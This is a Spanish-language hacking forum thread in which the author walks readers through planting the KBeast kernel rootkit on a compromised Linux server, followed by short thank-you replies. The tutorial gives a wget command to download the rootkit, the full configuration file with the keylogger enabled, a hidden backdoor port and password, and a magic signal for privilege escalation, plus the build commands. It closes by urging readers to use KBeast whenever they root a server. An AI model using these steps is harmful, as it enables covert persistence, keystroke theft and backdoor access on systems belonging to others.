[KBEAST] Plantando un Rootkit

q3rv0 · Octubre 02, 2012, 09:36:10 PM

Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:

-Ocultar archivos y directorios

-Ocultar procesos de (ps, pstree, top, lsof)

- Ocultar puertos locales abiertos (backdoors)

-Viene con un modulo keylogger incorporado para capturar las pulsaciones.

-Anti-kill para procesos

-Anti-remove para archivos

-Trae un backdoor bind incorporado

- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.

bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)

descargamos el rootkit.

Código: bash

wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz

una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h

Código: text

/*
Kernel Beast Ver #1.0 - Configuration File
Copyright Ph03n1X of IPSECS (c) 2011
Get more research of ours http://ipsecs.com
*/

/*Don't change this line*/
#define TRUE 1
#define FALSE 0

/*
Enable keylog probably makes the system unstable
But worth to be tried
*/
#define _KEYLOG_ TRUE

/*Define your module & network daemon name*/
#define KBEAST "kbeast"

/*
All files, dirs, process will be hidden
Protected from deletion & being killed
*/
#define _H4X0R_ "_h4x_"

/*
Directory where your rootkit will be saved
You have to use _H4X0R_ in your directory name
No slash (/) at the end
*/
#define _H4X_PATH_ "/usr/_h4x_"

/*
File to save key logged data
*/
#define _LOGFILE_ "acctlog"

/*
This port will be hidded from netstat
*/
#define _HIDE_PORT_ 13377

/*
Password for remote access
*/
#define _RPASSWORD_ "h4x3d"
#define _MAGIC_NAME_ "bin"
/*
Magic signal & pid for local escalation
*/
#define _MAGIC_SIG_ 37 //kill signal
#define _MAGIC_PID_ 31337 //kill this pid

prosigo a explicar la funcion de cada linea en el fichero de configuracion.

1- La primera linea la dejamos tal cual esta

2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos

Código: text

#define _KEYLOG_ FALSE

3- se encarga de darle el nombre al daemon rootkit

Código: text

#define KBEAST "q3rv0"

4 - En esta linea vamos a incluir los ficheros y directorios que queremos que sean protegidos por el anti-remove.

Código: text

#define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt"

5- Define el directorio donde se guardara KBeast

Código: text

#define _H4X_PATH_ "/usr/share/kbeast"

6 - Aca especificamos el nombre del fichero de log donde van a ir a parar las pulsasiones capturadas por el keylogger

Código: text

#define _LOGFILE_ "acctlog"

7- El puerto que estara hide a la vista de los comandos anteriormente mencionados.

Código: text

#define _HIDE_PORT_ 6666

8- Incluimos el password para el acceso con el backdoor.

Código: text

#define _RPASSWORD_ "q3rv0"
#define _MAGIC_NAME_ "bin"

Habiendo terminado de configurar el ficherito, que bastante intuitivo es, si me saltee la 9, pero esa la dejo tal cual esta.

Procedemos a lanzar el rootkit de la siguiente manera.

En los kernel 2.6.18

Código: bash

./setup buil 0

En los 2.6.32 como es mi caso

Código: bash

./setup build

Vemos que se compilo exitosamente en el nucleo sin ningun error, ahora vamos a comprobar si cumple con nuestras espectativas.

-Verificando la proteccion anti-remove de ficheros

- Directorio donde se guarda el rootkit en el systema

- Pulsaciones capturadas por el modulo keylogger...
El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.

- Port 6666 Hide

- Accediendo al sistema a travez del backdoor en el puerto 6666

- oka, para remover el rootkit del kernel solo basta realizar un:

Código: bash

./setup clean

Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast

Saludos!

ANTRAX · Octubre 02, 2012, 10:08:39 PM

Buenisimo man! terrible aporte!
+Karma!
Segui asi!

Muppet · Octubre 02, 2012, 10:53:07 PM

Buen aporte man! Gracias

x4r0r · Octubre 03, 2012, 12:10:15 AM

buen aporte man se agradece mucho

Barym · Octubre 03, 2012, 12:38:23 PM

Muchas gracias por el aporte

Sanko · Octubre 03, 2012, 02:08:31 PM

Brutal man.

Stuxnet · Octubre 05, 2012, 12:49:41 AM

Brutal

Gracias por compartir

saludos

CalebBucker · Octubre 05, 2012, 01:08:40 AM

Muy buena wachin

Mr_Pack · Octubre 25, 2012, 02:02:19 PM

Bien !!! como te dije en tu web está genial el tuto !!

gracias por compartir

DLV · Octubre 25, 2012, 07:07:55 PM

[KBEAST] Plantando un Rootkit

q3rv0

Octubre 02, 2012, 09:36:10 PM Ultima modificación: Noviembre 23, 2014, 01:18:55 PM por Expermicid

ANTRAX

Octubre 02, 2012, 10:08:39 PM #1

Muppet

Octubre 02, 2012, 10:53:07 PM #2

x4r0r

Octubre 03, 2012, 12:10:15 AM #3

Barym

Octubre 03, 2012, 12:38:23 PM #4

Sanko

Octubre 03, 2012, 02:08:31 PM #5

Stuxnet

Octubre 05, 2012, 12:49:41 AM #6

CalebBucker

Octubre 05, 2012, 01:08:40 AM #7

Mr_Pack

Octubre 25, 2012, 02:02:19 PM #8

DLV

Octubre 25, 2012, 07:07:55 PM #9 Ultima modificación: Abril 22, 2019, 02:09:46 PM por PlhaOGEOYceXkhd9rlYxJGzedkbolnxpnReqRiTk47d6JgDTRu